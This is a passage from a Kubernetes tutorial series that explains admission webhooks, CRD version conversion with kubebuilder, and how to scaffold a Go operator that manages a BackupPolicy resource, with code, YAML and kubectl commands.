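The patch string above is just a JSON Patch document, base64-encoded. The following standard-library sketch reproduces it; patchOp and encodePatch are hypothetical names used only for this illustration.

```go
package main

import (
	"encoding/base64"
	"encoding/json"
	"fmt"
)

// patchOp is one JSON Patch operation (hypothetical type for this sketch).
type patchOp struct {
	Op    string      `json:"op"`
	Path  string      `json:"path"`
	Value interface{} `json:"value,omitempty"`
}

// encodePatch serializes the operations to JSON and base64-encodes the
// result, which is the form the "patch" field carries on the wire.
func encodePatch(ops []patchOp) (string, error) {
	raw, err := json.Marshal(ops)
	if err != nil {
		return "", err
	}
	return base64.StdEncoding.EncodeToString(raw), nil
}

func main() {
	encoded, err := encodePatch([]patchOp{
		{Op: "add", Path: "/metadata/annotations/costCenter", Value: "engineering"},
	})
	if err != nil {
		panic(err)
	}
	fmt.Println(encoded)

	// Decode again to confirm the round trip.
	decoded, _ := base64.StdEncoding.DecodeString(encoded)
	fmt.Println(string(decoded))
}
```

In practice you rarely encode by hand: when the response is built from Go structs, a []byte field is base64-encoded by encoding/json automatically, and helpers such as admission.PatchResponseFromRaw compute the patch for you.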

Writing a Validating Webhook with kubebuilder

kubebuilder create webhook \
  --group storage \
  --version v1alpha1 \
  --kind BackupPolicy \
  --programmatic-validation

Edit api/v1alpha1/backuppolicy_webhook.go:

package v1alpha1

import (
    "context"
    "fmt"

    apierrors "k8s.io/apimachinery/pkg/api/errors"
    "k8s.io/apimachinery/pkg/runtime"
    "k8s.io/apimachinery/pkg/types"
    ctrl "sigs.k8s.io/controller-runtime"
    "sigs.k8s.io/controller-runtime/pkg/client"
    "sigs.k8s.io/controller-runtime/pkg/webhook/admission"
    esov1beta1 "github.com/external-secrets/external-secrets/apis/externalsecrets/v1beta1"
)

type BackupPolicyCustomValidator struct {
    Client client.Client
}

//+kubebuilder:webhook:path=/validate-storage-example-com-v1alpha1-backuppolicy,mutating=false,failurePolicy=fail,sideEffects=None,groups=storage.example.com,resources=backuppolicies,verbs=create;update,versions=v1alpha1,name=vbackuppolicy.kb.io,admissionReviewVersions=v1

func (v *BackupPolicyCustomValidator) SetupWebhookWithManager(mgr ctrl.Manager) error {
    v.Client = mgr.GetClient()
    return ctrl.NewWebhookManagedBy(mgr).
        For(&BackupPolicy{}).
        WithValidator(v).
        Complete()
}

// ValidateCreate validates a new BackupPolicy.
func (v *BackupPolicyCustomValidator) ValidateCreate(ctx context.Context, obj runtime.Object) (admission.Warnings, error) {
    bp := obj.(*BackupPolicy)
    return nil, v.validateSecretStoreRef(ctx, bp)
}

// ValidateUpdate validates an updated BackupPolicy.
func (v *BackupPolicyCustomValidator) ValidateUpdate(ctx context.Context, oldObj, newObj runtime.Object) (admission.Warnings, error) {
    bp := newObj.(*BackupPolicy)
    return nil, v.validateSecretStoreRef(ctx, bp)
}

// ValidateDelete is a no-op here.
func (v *BackupPolicyCustomValidator) ValidateDelete(ctx context.Context, obj runtime.Object) (admission.Warnings, error) {
    return nil, nil
}

// validateSecretStoreRef checks that the referenced SecretStore exists in the same namespace.
func (v *BackupPolicyCustomValidator) validateSecretStoreRef(ctx context.Context, bp *BackupPolicy) error {
    ref := bp.Spec.SecretStoreRef
    if ref == "" {
        return nil  // optional field; CEL handles it if required
    }

    store := &esov1beta1.SecretStore{}
    err := v.Client.Get(ctx, types.NamespacedName{Name: ref, Namespace: bp.Namespace}, store)
    if apierrors.IsNotFound(err) {
        return fmt.Errorf("referenced SecretStore %q not found in namespace %q",
            ref, bp.Namespace)
    }
    return err  // nil on found, real error on API failure
}

Writing a Mutating Webhook: Cost Center Injection

kubebuilder create webhook \
  --group storage \
  --version v1alpha1 \
  --kind BackupPolicy \
  --defaulting

Edit the defaulting webhook:

//+kubebuilder:webhook:path=/mutate-storage-example-com-v1alpha1-backuppolicy,mutating=true,failurePolicy=fail,sideEffects=None,groups=storage.example.com,resources=backuppolicies,verbs=create,versions=v1alpha1,name=mbackuppolicy.kb.io,admissionReviewVersions=v1

func (r *BackupPolicy) Default() {
    // Default is called by kubebuilder's webhook framework on admission.
    // The webhook handler calls this and patches the object.
    //
    // This runs AFTER API server schema defaults — use it for context-dependent defaults.
}

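// For namespace-label-based injection, implement the full webhook handler instead.
// The handler below additionally needs these imports: encoding/json, net/http,
// corev1 "k8s.io/api/core/v1", and k8s.io/apimachinery/pkg/types.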
type BackupPolicyMutator struct {
    Client client.Client
}

func (m *BackupPolicyMutator) Handle(ctx context.Context, req admission.Request) admission.Response {
    bp := &BackupPolicy{}
    if err := json.Unmarshal(req.Object.Raw, bp); err != nil {
        return admission.Errored(http.StatusBadRequest, err)
    }

    // Fetch the namespace to read its labels
    ns := &corev1.Namespace{}
    if err := m.Client.Get(ctx, types.NamespacedName{Name: bp.Namespace}, ns); err != nil {
        return admission.Errored(http.StatusInternalServerError, err)
    }

    // Inject costCenter annotation from namespace label
    if costCenter, ok := ns.Labels["billing/cost-center"]; ok {
        if bp.Annotations == nil {
            bp.Annotations = make(map[string]string)
        }
        bp.Annotations["billing/cost-center"] = costCenter
    }

    marshaled, err := json.Marshal(bp)
    if err != nil {
        return admission.Errored(http.StatusInternalServerError, err)
    }
    return admission.PatchResponseFromRaw(req.Object.Raw, marshaled)
}

The WebhookConfiguration Resource

The ValidatingWebhookConfiguration tells the API server which webhooks exist and which resources/operations they handle:

apiVersion: admissionregistration.k8s.io/v1
kind: ValidatingWebhookConfiguration
metadata:
  name: backup-operator-validating-webhook
  annotations:
    cert-manager.io/inject-ca-from: backup-operator-system/backup-operator-serving-cert
webhooks:
  - name: vbackuppolicy.kb.io
    admissionReviewVersions: ["v1"]
    clientConfig:
      service:
        name: backup-operator-webhook-service
        namespace: backup-operator-system
        path: /validate-storage-example-com-v1alpha1-backuppolicy
    rules:
      - apiGroups:   ["storage.example.com"]
        apiVersions: ["v1alpha1"]
        operations:  ["CREATE", "UPDATE"]
        resources:   ["backuppolicies"]
    failurePolicy: Fail          # Fail = reject request if webhook unreachable
    sideEffects: None
    timeoutSeconds: 10
    namespaceSelector:
      matchExpressions:
        - key: kubernetes.io/metadata.name
          operator: NotIn
          values: ["kube-system"]  # never webhook kube-system objects

failurePolicy: Fail vs Ignore

  failurePolicy: Fail (default)
  ──────────────────────────────
  If webhook is unreachable → API request fails with 500
  Use when: the validation is critical (quota enforcement, policy)
  Risk: your webhook becoming unavailable breaks all covered API operations

  failurePolicy: Ignore
  ──────────────────────────────
  If webhook is unreachable → API request proceeds as if webhook allowed it
  Use when: the webhook is advisory or can be bypassed safely
  Risk: policy is silently not enforced during webhook outage

For production operators, use failurePolicy: Fail but ensure high availability:
– Run at least 2 webhook pod replicas with PodDisruptionBudget
– Use cert-manager for automatic TLS certificate rotation
– Set timeoutSeconds to a value that allows graceful degradation (5–10s)
– Exclude system namespaces with namespaceSelector


OPA/Gatekeeper and Kyverno: Webhooks as Policy Platforms

Writing raw webhook handlers in Go is powerful but heavyweight for policy enforcement. OPA/Gatekeeper and Kyverno are webhook-based policy engines that let you express policies as code:

Kyverno (YAML-based policies):

apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: require-backup-label
spec:
  validationFailureAction: Enforce   # the default, Audit, only reports violations
  rules:
    - name: require-team-label
      match:
        any:
          - resources:
              kinds: ["BackupPolicy"]
      validate:
        message: "BackupPolicy must have a 'team' label"
        pattern:
          metadata:
            labels:
              team: "?*"

OPA/Gatekeeper (Rego-based policies; this rule goes in the rego field of a ConstraintTemplate):

package backuppolicy

violation[{"msg": msg}] {
    input.review.kind.kind == "BackupPolicy"
    not input.review.object.metadata.labels["team"]
    msg := "BackupPolicy must have a 'team' label"
}

Both run as admission webhooks that the API server calls. The policy language sits on top of the webhook plumbing. For organizational policy enforcement across many resource types, these tools are usually less code to write and maintain than custom Go webhook handlers.


⚠ Common Mistakes

Webhook covering * resources or * operations. A webhook covering all resources in the cluster is a reliability risk — a bug in the webhook or an outage breaks everything. Scope webhooks to exactly the resources and operations they need with rules[].resources and rules[].operations.

No TLS certificate rotation. Webhook endpoints require a TLS certificate that the API server trusts. Certificates expire. Using cert-manager with the cert-manager.io/inject-ca-from annotation automates this. Without it, expired certificates cause silent webhook outages (the API server rejects the TLS handshake, triggering failurePolicy behavior).

Not excluding system namespaces. If a validating webhook covers Pods and has failurePolicy: Fail, and the webhook pod itself crashes, the API server cannot create a new webhook pod because the webhook rejects the creation. Use namespaceSelector to exclude kube-system and your operator’s own namespace.

Treating webhook latency as free. Every API operation covered by a webhook adds a synchronous HTTP round-trip. On a busy cluster creating thousands of objects per minute, a 100ms webhook latency becomes significant. Set timeoutSeconds, profile webhook performance, and scope rules narrowly.


Quick Reference

# List all webhook configurations
kubectl get validatingwebhookconfigurations
kubectl get mutatingwebhookconfigurations

# Inspect webhook rules and failure policy
kubectl describe validatingwebhookconfiguration backup-operator-validating-webhook

# Temporarily disable a webhook for debugging (dangerous in production)
kubectl delete validatingwebhookconfiguration backup-operator-validating-webhook

# Check webhook endpoint certificate
kubectl get secret backup-operator-webhook-server-cert \
  -n backup-operator-system \
  -o jsonpath='{.data.tls\.crt}' | base64 -d | openssl x509 -noout -dates

# Test that the webhook service is reachable from inside the cluster
# (runs a temporary pod; any HTTP response, even a 404, proves connectivity)
kubectl run webhook-test --image=curlimages/curl --rm -it --restart=Never -- \
  curl -k https://backup-operator-webhook-service.backup-operator-system.svc:443/healthz

Key Takeaways

  • Mutating webhooks modify objects at admission; validating webhooks approve or reject them — mutating runs before validating
  • Use CEL for rules that depend only on the submitted object; use webhooks when you need external lookups or cross-resource checks
  • failurePolicy: Fail blocks API requests if the webhook is unreachable — ensure high availability before using it
  • Always exclude system namespaces and scope rules to specific resource types to minimize the blast radius of webhook failures
  • OPA/Gatekeeper and Kyverno are admission webhook platforms for policy-as-code — prefer them over custom Go handlers for organizational policy enforcement

What’s Next

EP10: Kubernetes CRDs in Production ties the full series together — finalizer design patterns, status condition conventions, owner references, RBAC for multi-tenant CRD usage, and the production failure modes that catch teams off guard.


Kubernetes CRD Versioning: From v1alpha1 to v1 Without Breaking Clients

Reading Time: 6 minutes

Kubernetes CRDs & Operators: Extending the API, Episode 8


TL;DR

  • Kubernetes CRD versioning lets you evolve your API from v1alpha1 to v1 without deleting existing custom resources or breaking clients still using the old version
    (storage version = the version etcd actually stores objects in; served versions = the versions the API server responds to; you can serve v1alpha1 and v1 simultaneously while migrating)
  • The hub-and-spoke model is the recommended conversion architecture: one “hub” version (usually v1) that every other version converts to/from
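  • Without a conversion webhook (strategy: None), the API server only rewrites apiVersion when it converts between versions and leaves every other field untouched, so you can serve multiple versions only while their schemas are compatible; serving versions with schema differences requires a webhook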
  • The kube-storage-version-migrator (or a manual read-and-rewrite of every object) migrates existing objects from the old storage version to the new one after you update storage: true
  • Changing field names between versions without a conversion webhook corrupts data silently — always test conversion round-trips before promoting a version

The Big Picture

  CRD VERSION LIFECYCLE

  Stage 1: Alpha                 Stage 2: Beta              Stage 3: Stable
  ──────────────────             ──────────────             ──────────────
  v1alpha1                       v1alpha1 (deprecated)      v1alpha1 (removed)
    served: true                   served: true               served: false
    storage: true                  storage: false             storage: false
                                 v1beta1                    v1beta1 (deprecated)
                                   served: true               served: true
                                   storage: false             storage: false
                                 v1                         v1
                                   served: true               served: true
                                   storage: true              storage: true

  Clients using v1alpha1:         The API server converts     Eventually remove
  still work via conversion       on the fly                  old served versions
  webhook

Kubernetes CRD versioning is what allows you to ship BackupPolicy v1alpha1 today, learn from real usage, evolve the schema to v1 with renamed fields and new constraints, and keep existing clusters running without a migration window.


Why Versioning Is Necessary

When BackupPolicy v1alpha1 shipped, the spec used retentionDays. After six months of production use, the team learns:

  • retentionDays should be renamed to retention.days (nested under a retention object for future extensibility)
  • A new required field backupFormat needs to be added with a default of tar.gz
  • The targets field should be renamed to includedNamespaces

These are breaking changes. Clients (GitOps repos, Helm charts, other operators) still have YAML referencing v1alpha1 with the old field names. You cannot simply rename the fields.

The solution: add v1 with the new schema, run both versions simultaneously via a conversion webhook, migrate objects to the new storage version, then deprecate v1alpha1.


Simple Case: Non-Breaking Addition (No Webhook Needed)

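If you only add new optional fields to the schema (no renames, no removals), you can add a new version without a conversion webhook. With the default None strategy the API server changes only apiVersion when converting, so this is safe as long as the schemas stay compatible. The example here also stops serving the old version: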

versions:
  - name: v1alpha1
    served: false      # stop serving old version
    storage: false
    schema: ...
  - name: v1
    served: true
    storage: true
    schema:
      openAPIV3Schema:
        properties:
          spec:
            properties:
              schedule:
                type: string
              retentionDays:
                type: integer
              backupFormat:          # new optional field
                type: string
                default: "tar.gz"

Existing objects stored as v1alpha1 are served as v1 with the new field defaulted. This works for purely additive changes because the stored bytes are compatible with the new schema.

When this is not enough: field renames, type changes, field removal, or structural reorganization all require a conversion webhook.


The Hub-and-Spoke Model

For breaking schema changes, the API server needs a conversion webhook. The recommended architecture is hub-and-spoke:

  HUB-AND-SPOKE CONVERSION

       v1alpha1
          │
          ▼ convert to hub
         v1  (hub)
          ▲
          │ convert to hub
       v1beta1

  Every version converts TO the hub and FROM the hub.
  The hub is always the storage version.
  Two-version conversion: v1alpha1 → v1 → v1beta1
  Never directly: v1alpha1 → v1beta1

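This means each non-hub version needs only one pair of conversion functions (ConvertTo and ConvertFrom the hub), so the amount of conversion code grows linearly with the number of versions. Converting directly between every pair of versions would need on the order of N² functions.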
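To make the linear-versus-quadratic claim concrete, here is a small counting sketch in plain Go. The function names are hypothetical and exist only for this illustration; they are not part of controller-runtime.

```go
package main

import "fmt"

// hubAndSpokeFuncs counts conversion functions when every non-hub version
// converts only to and from the hub (one ConvertTo and one ConvertFrom each).
func hubAndSpokeFuncs(versions int) int {
	if versions < 2 {
		return 0
	}
	return 2 * (versions - 1)
}

// pairwiseFuncs counts conversion functions when every version converts
// directly to every other version.
func pairwiseFuncs(versions int) int {
	if versions < 2 {
		return 0
	}
	return versions * (versions - 1)
}

func main() {
	for _, n := range []int{2, 3, 5} {
		fmt.Printf("versions=%d hub-and-spoke=%d pairwise=%d\n",
			n, hubAndSpokeFuncs(n), pairwiseFuncs(n))
	}
}
```

With two versions the two approaches cost the same. The gap only opens up from the third version onward, which is usually when a hub pays for itself.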


Writing a Conversion Webhook

The conversion webhook is an HTTPS endpoint that the API server calls when it needs to convert an object between versions.

1. Define the conversion hub

In the kubebuilder project, mark v1 as the hub:

In api/v1/backuppolicy_conversion.go:

package v1

// Hub marks this type as the conversion hub.
func (*BackupPolicy) Hub() {}

2. Implement conversion in v1alpha1

In api/v1alpha1/backuppolicy_conversion.go:

package v1alpha1

import (
    v1 "github.com/example/backup-operator/api/v1"
    "sigs.k8s.io/controller-runtime/pkg/conversion"
)

// ConvertTo converts v1alpha1 BackupPolicy to v1 (the hub).
func (src *BackupPolicy) ConvertTo(dstRaw conversion.Hub) error {
    dst := dstRaw.(*v1.BackupPolicy)

    // Metadata
    dst.ObjectMeta = src.ObjectMeta

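    // Field mapping: v1alpha1 → v1
    dst.Spec.Schedule      = src.Spec.Schedule
    dst.Spec.StorageClass  = src.Spec.StorageClass
    dst.Spec.Suspended     = src.Spec.Suspended

    // New field: default for old objects, unless ConvertFrom preserved a
    // non-default value in the annotation.
    dst.Spec.BackupFormat = "tar.gz"
    if f, ok := src.Annotations["storage.example.com/backup-format"]; ok {
        dst.Spec.BackupFormat = f
    }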

    // Renamed field: retentionDays → retention.days
    dst.Spec.Retention = v1.RetentionSpec{
        Days: src.Spec.RetentionDays,
    }

    // Renamed field: targets → includedNamespaces
    for _, t := range src.Spec.Targets {
        dst.Spec.IncludedNamespaces = append(dst.Spec.IncludedNamespaces,
            v1.NamespaceTarget{
                Namespace:      t.Namespace,
                IncludeSecrets: t.IncludeSecrets,
            })
    }

    dst.Status = v1.BackupPolicyStatus(src.Status)
    return nil
}

// ConvertFrom converts v1 (hub) BackupPolicy back to v1alpha1.
func (dst *BackupPolicy) ConvertFrom(srcRaw conversion.Hub) error {
    src := srcRaw.(*v1.BackupPolicy)

    dst.ObjectMeta = src.ObjectMeta

    dst.Spec.Schedule      = src.Spec.Schedule
    dst.Spec.StorageClass  = src.Spec.StorageClass
    dst.Spec.Suspended     = src.Spec.Suspended
    dst.Spec.RetentionDays = src.Spec.Retention.Days

    for _, n := range src.Spec.IncludedNamespaces {
        dst.Spec.Targets = append(dst.Spec.Targets, BackupTarget{
            Namespace:      n.Namespace,
            IncludeSecrets: n.IncludeSecrets,
        })
    }

    // backupFormat cannot be round-tripped to v1alpha1 (no such field)
    // Store it in an annotation to preserve the value if the object is
    // re-converted back to v1.
    if src.Spec.BackupFormat != "" && src.Spec.BackupFormat != "tar.gz" {
        if dst.Annotations == nil {
            dst.Annotations = make(map[string]string)
        }
        dst.Annotations["storage.example.com/backup-format"] = src.Spec.BackupFormat
    }

    dst.Status = BackupPolicyStatus(src.Status)
    return nil
}

3. Register the webhook

kubebuilder create webhook \
  --group storage \
  --version v1alpha1 \
  --kind BackupPolicy \
  --conversion

This generates the webhook server setup. The webhook must be served over TLS; the kubebuilder scaffold can have cert-manager issue and inject the certificate once you enable the cert-manager sections in config/default/kustomization.yaml.


Updating the CRD to Reference the Webhook

spec:
  conversion:
    strategy: Webhook
    webhook:
      clientConfig:
        service:
          name: backup-operator-webhook-service
          namespace: backup-operator-system
          path: /convert
      conversionReviewVersions: ["v1", "v1beta1"]
  versions:
    - name: v1alpha1
      served: true
      storage: false
      schema: ...
    - name: v1
      served: true
      storage: true
      schema: ...

Once applied, kubectl get backuppolicies.v1alpha1.storage.example.com/nightly and kubectl get backuppolicies.v1.storage.example.com/nightly both work — the API server converts transparently.


Migrating Existing Objects to the New Storage Version

After changing storage: true from v1alpha1 to v1, existing objects in etcd are still stored as v1alpha1 bytes. They are served correctly (via conversion) but are not yet migrated.

Migrate them:

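# Option 1: Manual rewrite (works for small object counts)
# Read each object and write it back unchanged so the API server
# re-encodes it at the current storage version.
kubectl get backuppolicies -A \
  -o jsonpath='{range .items[*]}{.metadata.namespace}{" "}{.metadata.name}{"\n"}{end}' |
while read -r ns name; do
  kubectl get backuppolicies "$name" -n "$ns" -o yaml | kubectl replace -f -
done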

# Option 2: Storage Version Migrator (automated, for large clusters)
# Install: https://github.com/kubernetes-sigs/kube-storage-version-migrator
kubectl apply -f storageVersionMigration.yaml

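After migration, all objects in etcd are stored as v1. You can then set v1alpha1 served: false to stop serving the old version. Before removing v1alpha1 from the CRD entirely, also remove it from the CRD's status.storedVersions; the API server rejects a CRD update that drops a version still listed there.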


Storage Version Migration Checklist

  SAFE VERSION PROMOTION CHECKLIST

  □ New version (v1) has served: true, storage: true
  □ Old version (v1alpha1) has served: true, storage: false
  □ Conversion webhook deployed and healthy
  □ Round-trip conversion tested (v1alpha1 → v1 → v1alpha1 preserves all data)
  □ kubectl get backuppolicies works at both versions
  □ Existing objects migrated (re-applied or migration job run)
  □ Old version set to served: false (stop serving)
  □ Old version removed from CRD after N release cycles

⚠ Common Mistakes

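Changing the storage version without a conversion webhook. With the default None strategy, the API server rewrites only apiVersion when converting. If you flip storage: true from v1alpha1 to v1 after a breaking schema change, stored v1alpha1 objects are read as v1 with the old field names: renamed fields show up as missing or get pruned, and new required fields fail validation on the next write. Always deploy the conversion webhook before changing the storage version.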

Lossy conversion. If ConvertFrom (v1 → v1alpha1) drops a field that exists in v1, objects are silently corrupted when a v1alpha1 client reads and re-saves them. Round-trip test every conversion: original → hub → original must produce identical objects (or use annotations to preserve fields that cannot round-trip).

Forgetting to migrate existing objects. After changing the storage version, existing objects are still stored in the old format. They convert on read, but etcd still holds old bytes. Until they are migrated, restoring an etcd backup only works while v1alpha1 and the conversion webhook are still present; once v1alpha1 is removed from the CRD, those old-format bytes can no longer be decoded.
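The lossy-conversion mistake above is easiest to catch with a round-trip check. The sketch below models it in plain Go with simplified stand-in structs (SpokeV1alpha1 and HubV1 are hypothetical, flattened versions of the real types, not the kubebuilder-generated ones). It assumes the annotation key used in ConvertFrom and restores the value on the way back to the hub.

```go
package main

import "fmt"

// formatAnnotation carries backupFormat through v1alpha1, which has no such field.
const formatAnnotation = "storage.example.com/backup-format"

// SpokeV1alpha1 is a simplified stand-in for the v1alpha1 object.
type SpokeV1alpha1 struct {
	Annotations   map[string]string
	RetentionDays int32
}

// HubV1 is a simplified stand-in for the v1 (hub) object.
type HubV1 struct {
	Annotations   map[string]string
	RetentionDays int32
	BackupFormat  string
}

// cloneAnnotations returns a non-nil copy so conversions never share a map.
func cloneAnnotations(in map[string]string) map[string]string {
	out := make(map[string]string, len(in))
	for k, v := range in {
		out[k] = v
	}
	return out
}

// toHub converts spoke to hub, restoring backupFormat from the annotation if present.
func toHub(src SpokeV1alpha1) HubV1 {
	dst := HubV1{
		Annotations:   cloneAnnotations(src.Annotations),
		RetentionDays: src.RetentionDays,
		BackupFormat:  "tar.gz", // default for objects that never had the field
	}
	if f, ok := dst.Annotations[formatAnnotation]; ok {
		dst.BackupFormat = f
		delete(dst.Annotations, formatAnnotation)
	}
	return dst
}

// fromHub converts hub to spoke, stashing a non-default backupFormat in an annotation.
func fromHub(src HubV1) SpokeV1alpha1 {
	dst := SpokeV1alpha1{
		Annotations:   cloneAnnotations(src.Annotations),
		RetentionDays: src.RetentionDays,
	}
	if src.BackupFormat != "" && src.BackupFormat != "tar.gz" {
		dst.Annotations[formatAnnotation] = src.BackupFormat
	}
	return dst
}

func main() {
	original := HubV1{RetentionDays: 30, BackupFormat: "zstd"}
	roundTripped := toHub(fromHub(original))
	fmt.Println("format preserved:", roundTripped.BackupFormat == original.BackupFormat)
}
```

In a real project the same check would run against the generated types, for example in a Go test that converts hub → spoke → hub and compares the specs.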


Quick Reference

# Check which versions have ever been persisted to etcd (not just the current storage version)
kubectl get crd backuppolicies.storage.example.com \
  -o jsonpath='{.status.storedVersions}'
# output: ["v1alpha1"]  or  ["v1alpha1","v1"]  or  ["v1"]

# Show the conversion webhook client config (prints the config; does not test reachability)
kubectl get crd backuppolicies.storage.example.com \
  -o jsonpath='{.spec.conversion.webhook.clientConfig}'

# Read an object at a specific version
kubectl get backuppolicies.v1alpha1.storage.example.com/nightly -n demo -o yaml
kubectl get backuppolicies.v1.storage.example.com/nightly -n demo -o yaml

# Check CRD conditions (NamesAccepted, Established)
kubectl describe crd backuppolicies.storage.example.com | grep -A5 Conditions

Key Takeaways

  • CRD versioning lets you evolve the schema without a migration window — old and new versions coexist via a conversion webhook
  • The hub-and-spoke model minimizes conversion code: N functions, not N² — the hub version is always the storage version
  • Never change the storage version without a deployed conversion webhook for breaking schema changes
  • Conversion must be lossless — fields that cannot round-trip should be preserved in annotations
  • Migrate existing objects to the new storage version after promoting it, then deprecate the old served version

What’s Next

EP09: Admission Webhooks completes the Kubernetes extension picture — validating and mutating webhooks that intercept API requests before they reach etcd, when to use them alongside CRDs, and how they differ from CEL validation.


Build a Simple Kubernetes Operator with controller-runtime and kubebuilder

Reading Time: 7 minutes

Kubernetes CRDs & Operators: Extending the API, Episode 7
What Is a CRD? · CRDs You Already Use · CRD Anatomy · Write Your First CRD · CEL Validation · Controller Loop · Build an Operator · CRD Versioning · Admission Webhooks · CRDs in Production


TL;DR

  • Building a Kubernetes operator means writing a Go reconciler with controller-runtime — kubebuilder scaffolds the project structure, RBAC markers, and Makefile targets so you focus on the reconcile logic
    (kubebuilder = a CLI and framework that generates the operator project scaffold; controller-runtime = the Go library that provides the informer cache, work queue, and reconciler interface)
  • The reconciler for BackupPolicy in this episode creates and manages a CronJob — it is the behavior layer for the CRD built in EP03–EP05
  • RBAC is expressed as Go code comments (//+kubebuilder:rbac:...) — kubebuilder generates the ClusterRole YAML from them
  • Run the operator locally with make run during development; no cluster deployment needed until ready
  • The same project that builds the operator also builds and installs the CRD — make install applies the CRD YAML generated from your Go types
  • Testing: the operator ships with envtest — a local API server + etcd for controller testing without a real cluster

The Big Picture

  OPERATOR PROJECT STRUCTURE (kubebuilder scaffold)

  backup-operator/
  ├── api/v1alpha1/
  │   ├── backuppolicy_types.go     ← Go types that define CRD schema
  │   └── groupversion_info.go
  ├── internal/controller/
  │   └── backuppolicy_controller.go ← reconcile logic (our main focus)
  ├── config/
  │   ├── crd/                       ← generated CRD YAML
  │   ├── rbac/                      ← generated RBAC YAML
  │   └── manager/                   ← controller Deployment YAML
  ├── cmd/main.go                    ← entrypoint, sets up the manager
  └── Makefile                       ← build, test, install, deploy targets

  FLOW:
  Go types → kubebuilder generate → CRD YAML + RBAC YAML
  Reconcile function → runs in cluster → watches BackupPolicy → manages CronJobs

Building a Kubernetes operator with controller-runtime is where CRDs become living infrastructure — the BackupPolicy objects created in EP04 now get actual behavior attached to them.


Prerequisites

# Go 1.22+
go version

# kubebuilder CLI
curl -L -o kubebuilder \
  https://github.com/kubernetes-sigs/kubebuilder/releases/latest/download/kubebuilder_linux_amd64
chmod +x kubebuilder
sudo mv kubebuilder /usr/local/bin/

# A running cluster (kind works well for development)
kind create cluster --name operator-dev

# Verify kubectl works
kubectl cluster-info --context kind-operator-dev

Step 1: Scaffold the Project

mkdir backup-operator && cd backup-operator

# Initialize the Go module and project structure
kubebuilder init \
  --domain example.com \
  --repo github.com/example/backup-operator

# Create the API (Go types + controller scaffold)
kubebuilder create api \
  --group storage \
  --version v1alpha1 \
  --kind BackupPolicy \
  --resource \
  --controller

If you omit --resource and --controller, kubebuilder prompts for them instead; answer y to both:

Create Resource [y/n]: y
Create Controller [y/n]: y

The generated directory tree:

backup-operator/
├── api/
│   └── v1alpha1/
│       ├── backuppolicy_types.go
│       └── groupversion_info.go
├── internal/
│   └── controller/
│       └── backuppolicy_controller.go
├── cmd/
│   └── main.go
├── config/
│   ├── crd/bases/
│   ├── rbac/
│   └── manager/
├── go.mod
├── go.sum
└── Makefile

Step 2: Define the Go Types

Edit api/v1alpha1/backuppolicy_types.go to match the schema from EP03:

package v1alpha1

import (
    metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
)

// BackupTarget specifies a namespace to include in the backup.
type BackupTarget struct {
    Namespace      string `json:"namespace"`
    IncludeSecrets bool   `json:"includeSecrets,omitempty"`
}

// BackupPolicySpec defines the desired state of BackupPolicy.
type BackupPolicySpec struct {
    // Schedule is a cron expression for when to run backups.
    // +kubebuilder:validation:Pattern=`^(\*|[0-9,\-\/]+) (\*|[0-9,\-\/]+) (\*|[0-9,\-\/]+) (\*|[0-9,\-\/]+) (\*|[0-9,\-\/]+)$`
    Schedule string `json:"schedule"`

    // RetentionDays is how long to keep backup snapshots.
    // +kubebuilder:validation:Minimum=1
    // +kubebuilder:validation:Maximum=365
    RetentionDays int32 `json:"retentionDays"`

    // StorageClass is the storage class to use for backup volumes.
    // +kubebuilder:default=standard
    // +kubebuilder:validation:Enum=standard;premium;encrypted;archive
    StorageClass string `json:"storageClass,omitempty"`

    // Targets lists the namespaces and resources to include.
    // +kubebuilder:validation:MaxItems=20
    Targets []BackupTarget `json:"targets,omitempty"`

    // Suspended pauses backup execution when true.
    // +kubebuilder:default=false
    Suspended bool `json:"suspended,omitempty"`
}

// BackupPolicyStatus defines the observed state of BackupPolicy.
type BackupPolicyStatus struct {
    // Conditions reflect the current state of the BackupPolicy.
    Conditions []metav1.Condition `json:"conditions,omitempty"`

    // LastBackupTime is when the most recent backup completed.
    LastBackupTime *metav1.Time `json:"lastBackupTime,omitempty"`

    // CronJobName is the name of the managed CronJob.
    CronJobName string `json:"cronJobName,omitempty"`
}

// +kubebuilder:object:root=true
// +kubebuilder:subresource:status
// +kubebuilder:resource:shortName=bp
// +kubebuilder:printcolumn:name="Schedule",type=string,JSONPath=`.spec.schedule`
// +kubebuilder:printcolumn:name="Retention",type=integer,JSONPath=`.spec.retentionDays`
// +kubebuilder:printcolumn:name="Suspended",type=boolean,JSONPath=`.spec.suspended`
// +kubebuilder:printcolumn:name="Ready",type=string,JSONPath=`.status.conditions[?(@.type=='Ready')].status`
// +kubebuilder:printcolumn:name="Age",type=date,JSONPath=`.metadata.creationTimestamp`

// BackupPolicy is the Schema for the backuppolicies API.
type BackupPolicy struct {
    metav1.TypeMeta   `json:",inline"`
    metav1.ObjectMeta `json:"metadata,omitempty"`

    Spec   BackupPolicySpec   `json:"spec,omitempty"`
    Status BackupPolicyStatus `json:"status,omitempty"`
}

// +kubebuilder:object:root=true

// BackupPolicyList contains a list of BackupPolicy.
type BackupPolicyList struct {
    metav1.TypeMeta `json:",inline"`
    metav1.ListMeta `json:"metadata,omitempty"`
    Items           []BackupPolicy `json:"items"`
}

func init() {
    SchemeBuilder.Register(&BackupPolicy{}, &BackupPolicyList{})
}

Regenerate the CRD YAML and DeepCopy methods:

make generate   # regenerates zz_generated.deepcopy.go
make manifests  # regenerates CRD YAML under config/crd/bases/
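Before relying on the Schedule pattern marker, it helps to see what it accepts. The sketch below copies the pattern from the marker and checks a few schedules with Go's regexp package. Treat it as an approximation: it assumes the API server's pattern matching behaves the same way for these inputs. The validSchedule helper is hypothetical.

```go
package main

import (
	"fmt"
	"regexp"
)

// schedulePattern is copied verbatim from the +kubebuilder:validation:Pattern marker.
var schedulePattern = regexp.MustCompile(
	`^(\*|[0-9,\-\/]+) (\*|[0-9,\-\/]+) (\*|[0-9,\-\/]+) (\*|[0-9,\-\/]+) (\*|[0-9,\-\/]+)$`)

// validSchedule reports whether s matches the five-field pattern.
func validSchedule(s string) bool {
	return schedulePattern.MatchString(s)
}

func main() {
	for _, s := range []string{
		"0 2 * * *",        // plain five-field schedule
		"0-30/5 2 * * 1,3", // ranges, steps, and lists built from digits
		"*/5 * * * *",      // step on a wildcard
		"0 2 * *",          // only four fields
		"@daily",           // macro
	} {
		fmt.Printf("%-18q valid=%v\n", s, validSchedule(s))
	}
}
```

Note that each field must be either a bare * or a run of digits, commas, dashes, and slashes, so a step on a wildcard such as */5 is rejected by this pattern. If your users need that form, the pattern has to be widened.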

Step 3: Write the Reconciler

